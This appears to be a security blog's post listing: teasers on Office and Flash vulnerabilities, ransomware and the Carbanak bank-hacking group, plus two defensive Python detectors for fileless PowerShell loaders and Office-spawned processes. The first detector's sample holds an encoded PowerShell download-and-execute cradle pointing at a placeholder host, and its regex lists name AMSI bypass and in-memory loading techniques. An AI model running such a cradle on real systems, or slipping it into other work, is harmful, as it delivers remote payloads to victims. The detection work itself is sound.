Two days ago, researchers at TarLogic published a proof-of-concept exploit for CVE-2017-11826, a Microsoft Office zero-day vulnerability affecting all Office versions. Microsoft issued a patch for the vulnerability in October; however, many systems still remain at risk.
Cybersecurity had a turbulent 2016, to say the least. We saw the rise of ransomware, the emergence of IoT botnets, landmark security legislation, and Yahoo’s disclosure of its 1-billion-record hack, the largest in history.
With fileless malware appearing more and more frequently, particularly sophisticated PowerShell attacks, we thought it useful to examine these threats by reverse engineering the in-memory samples on VirusTotal with the lowest detection rates.
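A first triage step for the PowerShell samples this kind of analysis starts from is decoding the command line and looking for the building blocks of in-memory execution (download cradles, Invoke-Expression, reflective assembly loading, raw memory allocation, AMSI tampering). The script below is an added example, not code from the original post or from Morphisec; the indicator list and the sample command line are constructed for illustration and are not a vendor signature set.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed indicator set for fileless PowerShell loaders (example only,
# deliberately small; real detection content would be broader and tuned).
INDICATORS: Dict[str, re.Pattern] = {
    "download_cradle": re.compile(r"(DownloadString|DownloadData|Invoke-WebRequest|WebClient)", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "memory_alloc": re.compile(r"(VirtualAlloc|WriteProcessMemory|CreateThread)", re.I),
    "amsi_bypass": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
}

# Short forms of -EncodedCommand accepted by powershell.exe. The trailing \s+
# keeps "-e" from matching "-ExecutionPolicy" or "-ep".
_ENC_RE = re.compile(r"-(?:enc|encodedcommand|e|ec)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if cmdline carries an -EncodedCommand payload.

    PowerShell base64-encodes the script as UTF-16LE, so decoding must use that
    codec; a payload that is not valid base64/UTF-16LE yields None.
    """
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> Dict[str, object]:
    """Decode (if needed) and score a powershell.exe command line."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hits: List[str] = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
    # Two or more indicators, or a single high-confidence one, is treated as
    # suspicious; the threshold is an illustrative choice.
    suspicious = len(hits) >= 2 or "reflective_load" in hits or "amsi_bypass" in hits
    return {"encoded": decoded is not None, "script": script,
            "indicators": hits, "suspicious": suspicious}


# Constructed sample: a classic download-and-execute cradle, encoded the way
# an attacker would hand it to powershell.exe. The host is a reserved name.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_CMDLINE = ("powershell.exe -NoP -W Hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"):
        print(analyze(line))
```

The decoder only handles the `-EncodedCommand` family; loaders that pass the payload through `-Command` with string concatenation, or stage it from the registry or WMI, need the same indicator scan applied to the reconstructed script rather than the raw command line.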
Recently, software engineer and noted tech journalist Ben Dickson explored the growing threat of ransomware in an article in The Daily Dot. He gives a thorough yet remarkably non-technical overview before tackling the difficult part: what companies and individuals can do to protect themselves. Dickson turned to our own Ronen Yehoshua, CEO of Morphisec, to understand why traditional security approaches fail and what the possible solutions are.
Yet another critical Flash vulnerability was uncovered this month by researchers at FireEye. The vulnerability, CVE-2016-4117, affects Flash Player 21.0.0.226 and earlier on Windows and Mac, along with the corresponding Linux and Chrome OS builds. It received a CVSS v3 base score of 9.8, rated Critical (Adobe rushed out a patch earlier this week).
The technology research group TechTarget recently published the findings of a survey on endpoint security at medium-to-large enterprises. The results corroborate trends all too evident in the news: despite the features and functionality added to endpoint protection software over the last few years, “organizations are still in search of effective protection techniques against unknown threats and malware.”
The Carbanak APT group, also known as “Anunak” (Kaspersky Lab named it Carbanak to reflect its Carberp origins), is one of the most notorious cybercriminal groups targeting the financial sector. Since the group was first reported in December 2014, around 100 financial institutions in roughly 30 countries have fallen victim to it, losing up to $1 billion. Carbanak attacks begin with malware-laden documents sent as email attachments to targeted bank employees; the email carrying the document establishes an innocent-seeming context. Once opened, the document delivers the malware, usually by exploiting an unpatched vulnerability in an Office application, in this case Microsoft Word. After harvesting credentials and data from the compromised workstation, the Carbanak malware moves to its next stage: infiltrating the financial institution’s internal network.
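The first stage described above, a Word document exploiting the application to drop and run a payload, leaves a characteristic trace in process-creation telemetry: an Office process spawning a shell or script interpreter, followed by an executable running from a user-writable location. The script below is an added example, not code from the original post or from Morphisec, that runs two such rules over constructed process-creation events (fields modelled loosely on Sysmon Event ID 1; hostnames, paths and timestamps are made up for illustration).

```python
import csv
import io
from typing import Dict, List

# Office applications whose child processes deserve scrutiny, and the
# interpreters/LOLBins a document exploit or macro typically launches.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

# Constructed process-creation events (not real telemetry). Row 1 is Word
# launching cmd.exe, row 2 the dropped payload starting from %TEMP%; rows 3-4
# are benign Word activity (a user opening a report, print spooler helper).
SAMPLE_EVENTS = r"""
time,host,parent_image,image,command_line
2015-02-10T09:12:01,FIN-WS-07,C:\Program Files\Microsoft Office\Office14\WINWORD.EXE,C:\Windows\System32\cmd.exe,"cmd.exe /c start %TEMP%\svchost.exe"
2015-02-10T09:12:03,FIN-WS-07,C:\Windows\System32\cmd.exe,C:\Users\alice\AppData\Local\Temp\svchost.exe,svchost.exe
2015-02-10T09:15:44,FIN-WS-02,C:\Windows\explorer.exe,C:\Program Files\Microsoft Office\Office14\WINWORD.EXE,"WINWORD.EXE /n Q4-report.docx"
2015-02-10T09:20:10,FIN-WS-02,C:\Program Files\Microsoft Office\Office14\WINWORD.EXE,C:\Windows\splwow64.exe,splwow64.exe 12288
"""


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    """True for locations an unprivileged user can write to (illustrative list)."""
    p = path.lower()
    return "\\appdata\\" in p or "\\temp\\" in p or "\\users\\public\\" in p


def detect(events_csv: str) -> List[Dict[str, str]]:
    """Apply both rules to every event and return the alerts in event order."""
    alerts: List[Dict[str, str]] = []
    for ev in csv.DictReader(io.StringIO(events_csv.strip())):
        parent = basename(ev["parent_image"])
        child = basename(ev["image"])
        if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
            alerts.append({"time": ev["time"], "host": ev["host"],
                           "rule": "office_spawns_interpreter",
                           "detail": f"{parent} -> {child}: {ev['command_line']}"})
        if is_user_writable(ev["image"]):
            alerts.append({"time": ev["time"], "host": ev["host"],
                           "rule": "exec_from_user_writable_path",
                           "detail": ev["image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The second rule is noisy on its own (installers and updaters run from AppData all the time); in practice it is weighted by the first, either by correlating on parent PID so the chain Word -> cmd.exe -> %TEMP% payload is scored as one incident, or by restricting it to hosts where an Office-spawned interpreter fired in the same window. The benign rows in the sample show why the parent check matters: Word spawning splwow64.exe is normal printing activity and must not alert.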